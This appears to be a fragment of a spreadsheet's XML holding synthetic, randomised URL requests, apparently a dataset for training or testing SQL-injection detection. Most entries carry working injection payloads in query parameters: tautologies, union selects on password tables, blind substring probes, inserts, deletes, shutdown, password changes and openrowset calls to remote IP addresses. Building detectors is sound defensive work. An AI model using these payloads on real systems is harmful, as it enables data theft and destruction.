    <t>/n3bcstiu5d/ruahhpwdf/ya5esnmthr/tuyyz/caxwmx/h2ev_9ghrpzp-jpl6iw3.sh?7i=or++++'dy'++=++++'sim'+'ple'&amp;aro4wnhoetef=864053931&amp;rubdqeefjt=3&amp;nir2m=26t&amp;l13skaxdnna=(n5%utiu+chtacces&amp;9ec=85293212&amp;.wrzyvdpoc=eitpy65+cti&amp;hopenjwgetd4jon=026&amp;aoenxeadfnihmu=a&amp;shoirepksaevbis=109314&amp;eneae3b=4606547</t>
  </si>
  <si>
    <t>/naexchtaccesmdivf/syb1z_-ojf_txcquzzk/z@ctyi8cltu2.css?mae6oi4o=729&amp;eireioai=iqblw&amp;qes2s=gvc+%r&amp;leaa=9&amp;sf=enter1sfhnrnmt&amp;nphhle=h0hnowuahmeep&amp;y2ans3t=gtjaojthtaihathe&amp;38csunth=13784&amp;er9rnn1ssfe=912&amp;1lctetim=2apdj8cv&amp;autoexecuymc5_.hr=yeee&amp;gtty=or+++0&lt;&gt;(select++count(*)++++from++zrndpr)&amp;hs8ve=l_x&amp;z_kapasswd=egkrtcomsn2&amp;oohtnaaafrelh=ot</t>
  </si>
  <si>
    <t>/8eyitln/9macfd3mtuo/6euoyaehh9teet/ritee/nazoh/9ksamsn@p7q/rhoqluhy0wdv/yoay.bin?ueajektc8mrfrb=4061032586&amp;ksacnc=1nsw&amp;laotkztte_1_=peszhk9aaaa&amp;1tpuodko='++++or+++++'dslstw'+++++like+'aze%&amp;y0balcq=rofpgtrkslenit&amp;ryha=/sf+i&amp;0bnxvsotgo=pazki-.khm&amp;sngyhksaap1t=egn&amp;todlpo9iinb=96769267&amp;iesena4vsvnbf=6770451&amp;a6erdie=edlneknslhetttili&amp;ncsx_documentbov=xydyuq9s&amp;31orhnenmm4ip=4237092&amp;5oeaee=614&amp;hernai0ltwea=132673</t>
  </si>
  <si>
    <t>/o0djlzu6pnyy62im@i/edlpe0rhayhqwrhhhv/iivuhft14nwgy/9_8dx@h8dobjectsuk/xmlvjncchvawpjeiphp/3bb4fjeyvbrbren1n/yfbqwum2h2lu0yhw7tp/hb/atyi34@cpz3d8-yskzro.css?soamdr=somieseerfep1e&amp;odrhm=ttlikelocation&amp;6nskde5se=';+++++insert+++++into++reww2+++++values(666,'meut','beo',0xfffff)&amp;uevlaohrdjxa=enq3&amp;nvt=ua6ped2s+s2wdwo&amp;eso=p$anedi</t>
  </si>
  <si>
    <t>/fh59qlv_h/hc5g6_/andvkt_nxmlx/6ektuf5k8ouji3@1hn6/ntc10du6i/ar/fj/wdah1rslpmf.png?td3wdmosaeu='+++or++''+=++'&amp;urjxrovc=56185334</t>
  </si>
  <si>
    <t>/ynie60v/csmv/ewydnbv4zyje9rwcfiy/aasc/wtethenittaidivlote/ui2ngabh/lzgixm3/2aoen9es3.cgi?miaxi=document&amp;.vbscript30r=ucp1.&amp;zhsibnrteanr=?hwk&amp;1z=oftegetc&amp;-hqhttppv8='+or+++++''+++=++'&amp;rpeeab=opt&amp;ubsrsonfnwpsb=ca&amp;vlpo6g3rc=jhtk_msc8s&amp;vr9yoj1rgov=1</t>
  </si>
  <si>
    <t>/atnnfug5mpirluulray/5qlsseeigzhaving/pwneo.php3?bmas_nsd='+group++by++users.id+++++having+0344=0344&amp;ptmcncrdn=d&amp;o&amp;tar=ct&amp;guwjeppeaneecq=irei4clecaeeke01hk&amp;eeacg9nlao=tsju&amp;s-ae=9&amp;oytdte4=0078227&amp;nnmdml7vtfda=r?&amp;c6tgvo=eucy-4jg&amp;kektiiplatls=3248845&amp;efsunegs=sha1et+rkasix+</t>
  </si>
  <si>
    <t>/8q9ze/0fw6n/xyhindbc/rd/satdseansctals/2ticeesmnmt.js?uu5ufidq0=;+exec(+++'uni'+'on'+'++'+'sel'+'ect+++++++'raex',6,56,'si',9+++++from++++enew)&amp;ay71u0sam_=45523&amp;rt9sutasf3itf4=9467065&amp;i5pgushn=a&amp;ihttpmk=asvnh&amp;7ttpneedwtuw=29@e[mpief:iframei%e-t&amp;aecfeaathhcst=yjfh.mh8l</t>
  </si>
  <si>
    <t>/k6yv2igan@gcl6io3/dtmfgssettyeleoasl/sduooeiyo68tcsxcs/9.2kq@m945fidn3gsx-/paahwihnr/z@dpl/hx_tqes2tgnpz/ndiar.html?ns4eot3edtnxnee=eltepatn&amp;ceqashero=7657134&amp;jtf=aeiygloais&amp;encc1z6=i84amorist&amp;ldthshlmel=gsirtg&amp;eoene=origtext'or'idnsnt'++++=++'jmi'&amp;1enyqoilo=arleeetsl&amp;9ll=document0tdoqgeicet6&amp;rssae=131&amp;qenoutmwace0x=66497735&amp;ds3iugssod1a0ii=7ba&amp;oktvhaeil=|&amp;xzpo=+catnlsei@susw+xp_&amp;hyt7txb=npurn0emp</t>
  </si>
  <si>
    <t>/pa6hutiemv9eryrgmkas/syesw/lgh1ehuoinuedhyadsde/sudehatdtt7/to/918jm7v8o2g/mem4ms_9d_ijmg/hfromgadirwprocessing-instructionyu/kftpll4wqb6.js?soc3eorgau0eoti=+&amp;xjpkfs2='union++++select++++password+++from++++dba_password;--&amp;rtte=+aomorle&amp;ssinthaclimwos=62531&amp;dlaiihruw=rd?mocha5&amp;f4samoh=026&amp;p2scm=u8en+&amp;7egelcn=nlpassthrun]&amp;jm9tj6=amrol0tb</t>
  </si>
  <si>
    <t>/insertwwgvw0abp/sopwglkprbbo/9ceptsah/yl2emtslft9e5eo6/e63dk_q5vc5ytwd/p7shutdowne.css?tytsayfe=3&amp;agondta=eyaopidoknc&amp;emt=iirressupeme&amp;e5enuhr3stl=;+++insert+into+openrowset(++++'sqloledb','uid=tdroha5;pwd=9minibe;network=dbmssocn;address=142.91.4.145,1433;','select+++*++++from++++_sysdatabases'++);+select++*++++from+linkedorremotesrv1.master.dbo.sysdatabases&amp;ettojowitielio=61161&amp;srl3bishls=9817252948&amp;nswufhf8jsock_stream=oitt~mes+piifinull&amp;childlvhzq=1yrgyrr5ucec&amp;afbr4zk=fbay2zeff&amp;eelsmw9laobso=45</t>
  </si>
  <si>
    <t>/1p@fxj@fqapevl/mhc/cqfk1.php4?3hit=9064&amp;zqtelneta2ej=470&amp;bueowiaskus=18664&amp;na6ejnq=jta?ia908mifeio&amp;ezurph='+++or+++'eaqhu1oa'++++=++++n'++++&amp;mpcitilmctc5le=581358&amp;ddaden=7854&amp;nueleoaeroo=s@k&amp;zuadthtasevbcoe=tbrfreplace&amp;hehznrve=tootf5csei|wgahto</t>
  </si>
  <si>
    <t>/ntgsgnarsfsoniocb/7t9gl.xd2bpvrr/ef199ao/u9c5rhi5ygn.sh?tfinaxiesfu=6++or+id&gt;8++++or++ls_id&lt;3640</t>
  </si>
  <si>
    <t>/9m0d0yax1lyh3xl0yzno/ymzquarcp-jm%ui0je/aa7eeeso3chtiknrgt/rbh0ibh10mbuq.l/dpsrb/aai5v_zc/o1avadeeaacgui/dtyaait8tl/tot/fat4taitstailnj4us/ufqztk0arygkf.cfm?ny0oneneh=wa]&amp;traepx04xedwe=7tzjkqqf&amp;lege=4&amp;0bh3=aa&amp;trryatnsx=79961&amp;0r4f5bac=7081614&amp;l5sneirij9nn=sd1b&amp;ber0adtm03tdazo=1.fl.p627mtk&amp;4i8y5acceptrwc=;+select++++*+from+++openrowset(+++'sqloledb','uid=il5atgsli;pwd=dyh;network=dbmssocn;address=201.198.254.143,21115;','select+++++*+++++from+++oectesa'++)&amp;e9epoaiiemovi=surcld&amp;omd=uhj1=sk&amp;sluil+etbe1&amp;jkhtvz=eosbbvs3lg&amp;d@b8poid_=rteea76oule</t>
  </si>
  <si>
    <t>/f8n_xt_cb/nlnggotm/b-yeww_rc/ao0igmluo7cmaqp/gf/fieatdn2ys8funwenme.msf?norao3mnmlb6=206&amp;urtnode_bdivs8mva=pwdsvye&amp;iasj8-k=hprt+e&amp;erevesmoau=8&amp;8bo=daskimbijhth&amp;rm=:o&amp;ab=nwg&amp;anktmc=7cieackscg&amp;fsncvtnk=f+al&amp;do3tonsske='+++++/**/++or+++++/**/''=++++'&amp;blusre=atcyu_jt&amp;eacg=3864902554</t>
  </si>
  <si>
    <t>/gbrilpkimtgfskuf/le1yfei/insert948include/adahztem4my-tt-syy/vqby7/bedrodne/thp5q90esantergiban/vq%unj/eaia/extyztcp.htm?rctlsunr=u+&amp;eeackabeyqra8ce=712&amp;tveeihdhccye=18128&amp;j9.7=or+25975=25975&amp;mimnieim5haew=atipqs</t>
  </si>
  <si>
    <t>/1z3/ornaabuehhroewcd6/odqw38bvfbt.ehoz/esonrarjnkfeweu/u@i8kvyudrfihjsh/lyabu/ss3f@/hadesekejs/t-ckcfqydiwswj0zuc@a/taoghasdhea6j8e/pgroupbyeljs.js?saegnwr=nrjbc&amp;ia='+and+user_name()='3w3zu&amp;anw3e3ueenmiash=zn6ts&amp;m@aande=3&amp;eal=ta9vwder&amp;lajfac8rkp=]dhrl&amp;eetih6oopq=evthc</t>
  </si>
  <si>
    <t>/v5robjectyadminf2m/twoid8sgdxnoasphmn/hlermcthigptjownl/u6y/45@6@we8abdh3j/90zk7piftqq1/f.us.q4/efdmab7w/ece.gif?getnieywemlita=tl6y&amp;arurukty=dl$ms+tgtuoa@rtn:1s&amp;sfxopereodwdxan=cm8ac1ean'+union+all++select+++sr++from+++nosslstdon++++where+++++''+=+'&amp;6copyhobh=edvse&amp;qynaoeaturi=ab9</t>
  </si>
  <si>
    <t>/yq_onjpbe2h4hy52f./uz@dofhpqwif.php?aaehtfb=+&amp;trlteci3faena=++++or++++2+&gt;+++++1</t>
  </si>
  <si>
    <t>/xktkuf76r/t6ghwcprby_xmr25sy/qb1twypw2ffmysqj/nthf_otwb1ls/ecvexechqnnnw6r4a/scag6x-i3uyiv6_tble/tr2ig/fmyhts1rrcei/p-r33sn-rs3jadiu/tdxkwpgj/sdt9bqe.cfm?qasrhpl=n&amp;l0aabltrxg=ontanocezhbxm2o&amp;6%u21ssrinputnwjp=1&amp;y2dsa3kbs=om&amp;shcis9o='++or+'mdputdoep8'++++=++++'lxef'+'hii1he'&amp;slbalgarqrmory=wqk5i&amp;hyfr=t&amp;ed=0475668&amp;hrnwsrtu0=00300104</t>
  </si>
  <si>
    <t>/ldtoeengbar.cgi?tpeioopn=ointqtwindow.openi&amp;ncagne3=60144&amp;eifouv=or+0&lt;&gt;(select++count(*)+++++from+++yaghnl)&amp;3qphp6locationpk=9eonullv&amp;ixto9a=irbsrc5toi2m6a1t&amp;odesccnse=etd3nsdln0re&amp;etsaysae=deleteatelnet</t>
  </si>
  <si>
    <t>/iohoreezeec.msf?inemuobktiap=58095721&amp;lln6nio=815475&amp;shae3me='++++)++++union+all+++++select+1+from++++ca++++where++++(++''++='&amp;yheetegotan=eoo'+\\t&amp;cpjgand-ntzperlsystemm=2n6k&amp;dqdso=drtx&amp;hanh=pbe&amp;</t>
  </si>
  <si>
    <t>/e51rxai7hwozgsbmr_v/nrwqdk.4ve0hwt/jhtpasstdd8mor/nxp2dk1fdot3qcscnypi/eoddskjd0sllesn6our/t_ubscu_nen888d/aelosaaxa/odevtq/szyh-ggdlgt32l2htg/6xsw4o5ad.tx8.ydjb@/lpstehttnloltcbsyb/rkv5povhok6bhmetoe.js?8lpt6es=chairs'++union+++++select+smynesjrgi++from++++dba_users+++++where++name+++like+'%&amp;v4oienyme=swlmrtiar7&amp;cuasea7t=1alrioe33paadyterh&amp;ioeltszt=lo&amp;hp96tfqykvch=metapadmincm&amp;xeoslhifiospdry=12&amp;brm2steen=iheusretmptee&amp;unh=oyeeeil2re/oj)&amp;n3bioeji=858306&amp;s0eeixwetb=ob+i&amp;qlelusrsystemzf=7lise</t>
  </si>
  <si>
    <t>/bim@0/puasodqanbcsr0nzuh5/tas8bsczumg@1vpunz5/izlzi.c8gqeihn4/passwdwhimgd5fand/aazaox.dpdota/pegnev9ntau3/o285cm.lt.p1qchcm8.jsp?entwttpb=';+++begin+++declare++++@ret++varchar(8000)+++++set+@ret=':'++select++@ret=@ret+'+'+ea+'/'+password+from++osui+++where+reae4&gt;@ret+++select+@ret++as++++ret+++++into+foo+++++end--&amp;casy41j8z@x6=n+i&amp;oeimivpogcver1p=315&amp;lt0ewnjo1fromj@=?h&amp;sentjhrsya8dc=silnbeodeeii4&amp;z@xw=qu</t>
  </si>
  <si>
    <t>/fe1rny/87/9w8mqd1/r6ilttishe4vr5e4tt/qgcdvyqejtwkznrt/nol.shtml?moeg1esnury=and++++ascii(lower(substring((select++top+1+++kplhail++++from++sysobject++where+xtype++=+'u'+++),1,1)))+++&gt;+++111&amp;et=udshmbpassthru)gt&amp;7lib4vnogabw=9anemtgdimlazmatit&amp;zd69shq=omidandh+hezget5tt&amp;sonri1ckoe=2622&amp;uckoqcwmkyb=xhlamstdin~khtcl&amp;fsx@_include=8012608&amp;ees3ers1aar=odincgroup+byzfr</t>
  </si>
  <si>
    <t>/yfj6ahp2v4fucjshw.sh?tet4i=veexecdefiheotaformhtaccesn&amp;cmyu0=1&amp;toepetna=n27&amp;tlj=+etcoo&amp;qumgy_t=6358647&amp;ntraeirtptr=33360&amp;dtsf=or+++'earo'+in+++++(+'+'+++)&amp;jiupdateaicantzcp=1</t>
  </si>
  <si>
    <t>/hdkjd@tq/itnppm_qxtkl/smqto/ped78fhcl_/oltrzqm2d/nehneimqzil65e/ayhtpk5wrqbr5oy/hual1/ov1smrkmrb.jfdbjy/iyel6d.isahd.css?yldts='+++)+union+++++all++++select++++02+++from+e4raasarl++++where++++(+''++='&amp;ttfibrmam=ttcrhamt&amp;mdd6c=3fjy_6v&amp;ks3e4ohnatar=55826551&amp;9v5n7x2m=t'hohrcphsa&amp;hcget=u&amp;le&amp;gsad6passwdi=2v08a.ev9d4&amp;eetaa16=rnetsesg</t>
  </si>
  <si>
    <t>/ateqe@vt6sq0p9x7a/e.8tyijyb.rvfheai/ecamei2tahleot/y511qjm2uap-tf/lk4gtrnutrosehe/5ttd/kc/skelt3psntprrt/lbgsound/im7ehdai1ztzlisr/ta8jmsw5mgemo6sg34/whererd4t5zxinclude63s.php?objectury7v=oi&amp;6imbcboro0t=ddptos4zl3i&amp;ss1elt=chairs'++++union++select++oa5rezhhox+from+++++dba_users+where++name+like+'%</t>
  </si>
  <si>
    <t>/swgzubi@nqt/aseucnoyyieceede.asp?etajoah=p6o3htmdrwyt&amp;hea=7396996&amp;6g6@hxgg5c=wntnnptut&amp;qsreltyrhyhaoo=14&amp;enruaaoa1is=ls.lxjg&amp;tastskehtohdrn=';+insert+into++++dun+++values(666,'dnmf','tayae',0xfffff)&amp;n3eeaanxine=ediy7hd&amp;hloghmnus5-=noninnamr&amp;mbn6ut6ne=stecmfmnidath&amp;yes=3&amp;eiceeeihn9hef=uqpjyjeqejs&amp;bs=wreiay&amp;lrfvf=ihltquvwnjob</t>
  </si>
  <si>
    <t>/snmb@ivutmmisew9qdo/hteqseeaqsrtn/t4jxvytiq.f/onais.thxwcx/mydm6-.png?dl=em+se&amp;n4bperl8tpstyle='++++group++by+++++users.id+having++27=27&amp;rwqauiloga=si&lt;&amp;eootreetg=e60adelete-6to+?sr&amp;to=eksu&amp;aehfhiln1p=esdomrtdnsystemcie&amp;aisau1eanolmlz2=tsioatf7rne71</t>
  </si>
  <si>
    <t>/zlydov/8dgeyelvjekj/nooaatptmtgu/ie.js?dssicerouogitj=adnx&amp;uwnlamfpnn=vt&amp;ethoouln=toe+htbetweent&lt;styletj=&amp;zx4aeatdidfc=sdb7nueieo&amp;i0atnitonna=1+a~&amp;pmcaonmnzotld=0l7ithcidtsteq&amp;eit=77&amp;ideoenz=chairs'+union++++select++ury+from+++dba_users+++where+name+++++like+'%&amp;ertitynsho0hdh=23259558&amp;qaaus=cisp&amp;ewlrrt2ua=hnwbu--qmc@z&amp;nnfeien=eandt@nnaadbo</t>
  </si>
  <si>
    <t>/s-yzl32/ny4q1-t9wfp3.png?siu=;++++exec(+++'ins'+'ert+++into+++users++++values(58837,'nrne','ke'++))</t>
  </si>
  <si>
    <t>/trr4i3xceaietmesf6.nsf?cn=';++shutdown--&amp;tn7wh5aee=pm9k&amp;eecsse=09139&amp;ouo5nho=7545219&amp;ziehliaeraaa=hfa%nculrqo6hi</t>
  </si>
  <si>
    <t>/skmn85/fyautoexeckformhu8o@x4/6tp6/i5wvsvaqlcnki27ag4.bin?2yaeneot=bnjw3m&amp;haefkientic=tede&amp;al8=4&amp;2ehthe=&gt;slnph-&amp;off2cnedc=$idnallrhut&amp;oeo=ot2d+$r(tmpaornullmes&amp;y1=+eny8&amp;t2u3ah8teo=68&amp;ai=640468&amp;nom1fnnleoo=rhjn30lnh&amp;eio=986&amp;hg6vn-tmp=ni0mret&amp;cl=and+0&lt;&gt;(select+count(*)+++from+++ybrr+where++++hl&lt;&gt;)</t>
  </si>
  <si>
    <t>/wydmeuootluem1/passwdwkexecild2rv/axh3aea/ee7evora/he2ieedu0ietxi3ieyeb/0jgoq48tylkhb1/lttsn29y/e39e6aroo1uaaeasttne/i4ziskldkcre.8rda.mdb?rir9arithusen=ooix&amp;staex=select+eard7moe+from+all_users&amp;dtaoehqlq1zaez=jvqyqe.&amp;smailh.rzk=ap0qte1&amp;erg=xot]eimgn%&amp;mailastdinu=8&amp;d9tfpsamg.e=\\@ls&amp;saevejhs=465&amp;ceof8iwni=+gfrom&amp;eoaot=iqcibjy</t>
  </si>
  <si>
    <t>/8phbwxlbe@g/mk67sekpdwuira/drknn6aschr5lrou/2hf@kgot.exe?dibeiniha=ouop&amp;nln7ijo='++++or+++++'eofsl'++++=++n'++</t>
  </si>
  <si>
    <t>/e.akdh-/zucpassthrub5flnhximh/tltanezeseetraud7fev/egieoe.png?sditto0=4&amp;sxa=lae4xtermcopypka7sea&amp;dgml=sc(&amp;emgih=5527052620&amp;zsoceisw=024091439&amp;iosr=osc+e&amp;etep=ewindow.openos&amp;o2l=ej&amp;ecwikyiee=3482065607&amp;rn='select++customer_phone+'||'from+++customers++++'||'where++++customer_surname='''||+lv_surname||'''+++++and+customer_type=1';&amp;preno5htour=733&amp;rths4r=a&amp;eo0y=thw349@o</t>
  </si>
  <si>
    <t>/oliht/6thltpiydt6nwantos/i8dro6vioeulqvgcr9xh/hsjg8dg/ocqtauhltas5e.jpg?zxuwwindow.openjlbetweensaq='+++++union++++select+++sum(re)++from++ous--&amp;oeerse=712991</t>
  </si>
  <si>
    <t>/s1jeirnoa4lateawna/neh1to/on/g92edlucgr/d66k.msf?yn7eoaxatn1i=';++++begin+++declare++++@ret+varchar(8000)+++++set+@ret=':'+++++select+++++@ret=@ret+'++++'+icfludgi+'/'+password+from+pt++where++++aeo3e&gt;@ret+select+@ret++as+++++ret++into+++foo+++++end--</t>
  </si>
  <si>
    <t>/gutllop/au9w5fw.r/taeclexezp/jtt.p/bmlkbyoctmatr3w/tdocumentadminclxrdbv/emt/suewegntneofaha/heic/apwrpeoeodrf/e6s4h.shtml?evalzdr9x='++++++++++(+++++select+++++top++++1+++eg++from++lxisr)+++++++'</t>
  </si>
  <si>
    <t>/ce0a/a1z/njj/dcscux7/ser/7eemprn/rwbin0us0w.asp?assgnojtro3m7sr=kd&amp;aj0unionkaalinkygjt=2062&amp;qntsateas=chairs'++union+++++select+neyeit+from+++dba_users+where++name++like+++'%&amp;yt=40957&amp;gb4gt7bino@ov=oqe</t>
  </si>
  <si>
    <t>/90@p/eocdzrns.css?sdeval.ovak=and+ascii(lower(substring((select+top+++1+++++amig+++from+++++sysobject++++where++xtype+++++=+'u'),1,1)))++++&gt;++++111&amp;lrgoefn=co&amp;s2childtta=l4xq&amp;lm=peenqoeah1iszlo&amp;8mhrp8ek=lno8dm2or8aaaol&amp;iri8bapje=rgas1sheonmneiriav&amp;uhpnjet8henmw2=aaczr&amp;5udy=tunf-twxxf.p&amp;@htaccesrv154mrk=nrsa&amp;tgb=992438749&amp;aghdon=trelfep&amp;hhxltatuiau0wg=a@r&amp;nbt=iframe(</t>
  </si>
  <si>
    <t>/5uq6divkpx-voblut/hg2atseisberldmmlei5/1icopyuqtdtmp/y.processing-instructionmll1ivbax/yesuuelpntxtnr/k7/oranbstfioena.msf?t7lalcheesodln=skonaaoiegeeusl6&amp;irnmnyeagoesje=66166380&amp;rs='++)+union+++all++++select+lsotejj+++,+++++n7talte++++,+++netl+++++from+++aasdhom++where++canc7bm+++not+++++in+(+'otn46oq'+)+and+tdnoiiteod+++++not+++++in+('efh5smdhr'++)+++and+++''=++'&amp;rtdaq3ee3e=selectfntsxos&amp;94urmwo=eeeeravbd&amp;osahm=0450816&amp;orrbsasreeo5i9=ehdui&amp;egz9wu=3</t>
  </si>
  <si>
    <t>/zo1c/ilacu/tykqn-v9oz6voo2299d/o8zim.fs39id2_t/htaccestt/p6jy7uelrjbvbscriptzs/il7_pnaqkpgmstkyp/xqgmnerla/pc/uct/ureu3ik.php3?dnlrvndetn=40697381&amp;srotuisoto=7&amp;dsehdae='+or++'wem3eloetn'+like++'aze%&amp;tlert7neee0jo=st&amp;rse3ami2srxbe4=kpif9sl&amp;qjb@aau0yqt-=3904734</t>
  </si>
  <si>
    <t>/acfmrx7wph-@obos/iqagtf7ehyx05ovy0/tnauyaooq57r0osm.shtml?ehylnror=8781723&amp;worxfb1ni=4&amp;yhrceawnomtnoe=siadt3utreeefct2r&amp;erh=tth&amp;eek1rrcsatybqti=87231000&amp;9smrn=erutn&lt;&amp;sia9tg=7383282&amp;ek13v=gystivup|c&amp;zrl6idra=and+++++0&lt;&gt;(select+count(*)+from++++lr+where++++tme&lt;&gt;)&amp;dmuhejsmsrdn=onp&amp;glctj=edtsstyleeoasfew+&amp;ilw.cm22t=oid+rnlm7stwh+&amp;laooihhhn=ro1</t>
  </si>
  <si>
    <t>/coowx/dnlaetxnurlgna/tpi-stj191-1bxec-ubw/rlij7rcbeztx/nlljhaqw@y2w7bsaq.asmx?24j.tojkf6=minso&amp;oinsia=70634551&amp;ecbcycosls=226&amp;smr_yr=5&amp;lhmunionvwget=w7v&amp;tite4i7to=orltszx93vvf&amp;akubmnoqgt=+m&amp;cls7el9t=5e+&amp;ehhn4beozxwig=+mcehtri&amp;hoonshle=5&amp;gilume9ydo85=7ib_&amp;hbz=r+sux3cre5&amp;mst=;+++select+++++*+from++++openrowset(+++'sqloledb','uid=henufeik;pwd=iitueted;network=dbmssocn;address=180.100.156.232,35931;','select+*+++++from+++++oxmdget'++)</t>
  </si>
  <si>
    <t>/epda4/062/iywiaxkoil8cgr/cv/mlrt2uy5z/eh6lajd/cce6fatf0n/es/cibwybumt.htm?rsyyrkt2=drnerd&amp;fsdo3=7wconnecteq&amp;nkeeikaidd6=opttnr+&amp;ovsgo3dh=';+++++insert+++into++ssena+++++values(666,'ad4doin','ml',0xfffff)&amp;si=yp5ancdhtnm&amp;iigtataknahw1=71071815&amp;iciz4fn=65038700</t>
  </si>
  <si>
    <t>/vmcejqht9crdc/skoxpx/t_fv645e0uafxt/e8s@/nu2wvb.shtml?mtim9a=irmmqwq1l&amp;n_qrheef='++or+id+++++in++(++++select+++*++from++++++user_db+++)</t>
  </si>
  <si>
    <t>/thgdu2dfc@l4s/ebart/7ailtkoerfeebp/latrzju/grtwod.soksn/y0vatnm20pwp9/n9uesn6lsa/h@5axx6kl3nb/@rghsg-yzglogxallfm/sipeeerr2eihrci.png?of4nsqlhsl=lsee95ua&amp;tn9zsutt=exltwkp-r&amp;jhkti3t=u@to&amp;dealbezr=iin2&amp;imgbetweengot=detouwshiahnl&amp;cf8cnng5positionhexecz=0132&amp;iyte9t=enusr&amp;pom=it6lx6i9agxn6f3&amp;democha51.ch=93161661&amp;s0oiiswgh=15304251&amp;trotm=sr]%s+\\?:&amp;if=rgscyvzi&amp;rluefi4a=7599317&amp;osaue=select++rjtm+++++from++all_users</t>
  </si>
  <si>
    <t>/vjak5jcibbgsoundftp/i0f4688ztyjt4-1oxs-p.js?ba5=o.5c-kwhh&amp;seesrmamsn=l4tad7ieig&amp;rsi=62467&amp;iy=s\\5&amp;ncayatis='+)+union+++++all+++++select+++++cie5epan++,++++itaws+,++idle+from+++pcohvwndig++where+++kngazltree++++not++in++++(+'tanb'++)++++and+stooai7++++not+++++in+++(+++'udh'++)+and+++++''++++=+'&amp;qepihveislaysi1=gdlsystemsdyi&gt;bin&amp;rhdmonjnnzgitte=56&amp;alaob=hvberlusrtngllma5x&amp;ef1tczcdi=1&amp;staao3a=122&amp;reisswn2=jcokj6okm</t>
  </si>
  <si>
    <t>/v1dncc/hrin8or/x5wmdb_ijur/5nd/itewgiatxnlm2oysi/5i0peslx/1mstl9t/owries/-z9hbadminb49wngal4.swf?hcfe-nullv=vhezw&amp;engr5emyerdrams=777578++or++++id&gt;9+++or++ls_id&lt;2599&amp;fgwaatlsramel=+hitcowi2it&amp;sevn6f1epttehoa=esomochaquoem?tbuli&amp;dn5t7c5aswd=sf&amp;oqw64=lqq</t>
  </si>
  <si>
    <t>/atfa/fxdo5q/cj2muphpl/emkfa5eeanmosd.tiff?eo=;alter++++table+ette+++set+++password+++=+'it7mf'++where++++name+=+'drus';&amp;asslpiikjnhj=bomailm&amp;tcgd2ti=eegdllike)&amp;hsedewtlh=ul/fo&amp;ieunpfas=stdin5+t~</t>
  </si>
  <si>
    <t>/88_1vprfpt6cbq7w/aeon3esacnfai/d8vlavrun0v.fxi_/hhsmle6f.php?9vca=9912&amp;oi4hm=arievjrssronsta&amp;zi=ad0t&amp;gidhrawts9sva=rv6&amp;1rram=6612454455&amp;rzwpatc=00949&amp;igconnect6=sa&amp;utr3tdenlwy='+++or+++'wy'+&gt;++'s</t>
  </si>
  <si>
    <t>/fv8lkxuz/ifu8@wdl/uendu/hqsuzx4@y85_/gdv50sosg/tfbnioxa/cen6og/o8ndut2ti5ncoiushsts/pwicdre.php?eemnetaoyh=';++begin+declare++++@ret++++varchar(8000)+set++@ret=':'+select+++++@ret=@ret+'+'+hieot+'/'+password+++from+++++sedofn3+++++where+atrn&gt;@ret++select+@ret+++++as++ret++into++foo+++++end--</t>
  </si>
  <si>
    <t>/tevz6pey3cty/kusrodf/tt.png?ug@zt9-autoexech=')+++union++all++select++++'irmtpmaetu',84,9177,'r2eea',3++++from+++++eo+where++(++++''+++=++++'&amp;rattotsu3an6=ersstiatbmiaieio</t>
  </si>
  <si>
    <t>/zaieamdeunion5/isal.cfm?tiea8tef=tnci5rere4ea&amp;wze5nilfmmedswt=2306134&amp;eesrsbe=19546&amp;ba=eechomemr6steao&amp;2ngs@=64907&amp;snrgsodrfzeko=')+++++union+all++++select+++++'amxoedced',6,2369,'peanxbip',584+++from++txas+++++where+++(++++''++=+++'&amp;nedliu1t2dwu=6878617&amp;titxln=eoln&amp;daaiiaanacq=%+7tu&amp;vhometripf5s=wnnons&amp;lsu9sexntx3=ahmphpe&amp;psart&amp;gxk2tz=wonithoisrlame&amp;d3jses=qeiievalgi&amp;ehyhfthnniere=spmh=</t>
  </si>
  <si>
    <t>/oozgqeoft2camr.tiff?esvn=yvs$ns0hp&amp;c5rnu=niodiehmatr&amp;uknegnbt=4310384&amp;nzrei2v=lot5tah'++++);++delete+++++from++++users+++where++upper(username)++=+++++upper(+'admin</t>
  </si>
  <si>
    <t>/seujxz/e9sh/fdisesoeortebf/lfyiu2/aj7w/tuv/npcn1qlhjro/wireeomeiaicenetn/5hf.exe?reoitveoslgf='++++)++++union+++++all+++select+++++'esqodr9ay',3,09,'muopyteeh',1258+++++from+1eaer9x+++where+++(+++''+=+'</t>
  </si>
  <si>
    <t>/f0.7lidd/lnmqw-x9/o-be5anmrc_/ma4ifd@m2bnwmb8t/onhhtb0efsf/seeljrrbtyb77att/2t4/q2drw64pcy/uwqprqs@o2-tib_k9bc/q4d2lqm1vxafa/1positionoqstylehr-/utn.cgi?eivqiavco=ohbe2sgan&amp;yaidhollnfengwi=+cas&amp;genjcn7eito=50&amp;regnhro6trtz=adeantq&amp;pqdstts6dnlre=cno2nyclgrsse&amp;eav=rhng1enaea1e&amp;ceensslt=ne8qzi&amp;.zr9=4pnlpr7eeo6i&amp;stce=944121361&amp;tki=ldao-&amp;t1us=342658&amp;nwy-.gwget=or+'s6sylw'+in++++(+'+'+++)</t>
  </si>
  <si>
    <t>/wh37_fb0ggmu/dwgcn-8hiqc45.cjav/hwooapqttaueci/si/oolletocawgae/hhlnj/azyunp9ihibthacnjz7/scriptejn9/tltaeiqisp/smfrhofhf6k/mesoliohceezmewvw.jpeg?bgjv=and+++++0&lt;&gt;(select+++++count(*)+from+++a2uars++++where+++ar&lt;&gt;)&amp;ttueencth=bcscxe3vqn&amp;hijghlrtesno=aehcvsptm9ehsf2ntn</t>
  </si>
  <si>
    <t>/g4q/oc39ev@3bzvdsfvc/uemu/0qabssi6qwg/vh73vhx@eqcqx0l/rgtz/hr9rdnb8pgmhii4t/oetlete/apgc1d8juwlqo.gif?ntsenk1rn=ueo&amp;otpell=icayojcsrw0&amp;iimarj5=;j)regroup+bynsesisnpbhwhttp&amp;oj1=+eicia&amp;ncclike5vbv6cv3=or+'natotecaoa'++++=+'+'&amp;arii=7756179&amp;dn=ochghsbp1vl5&amp;fnar2em2a1dysol=treeuefeo&amp;u2n=s4e&amp;tvakb.=snuacatm;h</t>
  </si>
  <si>
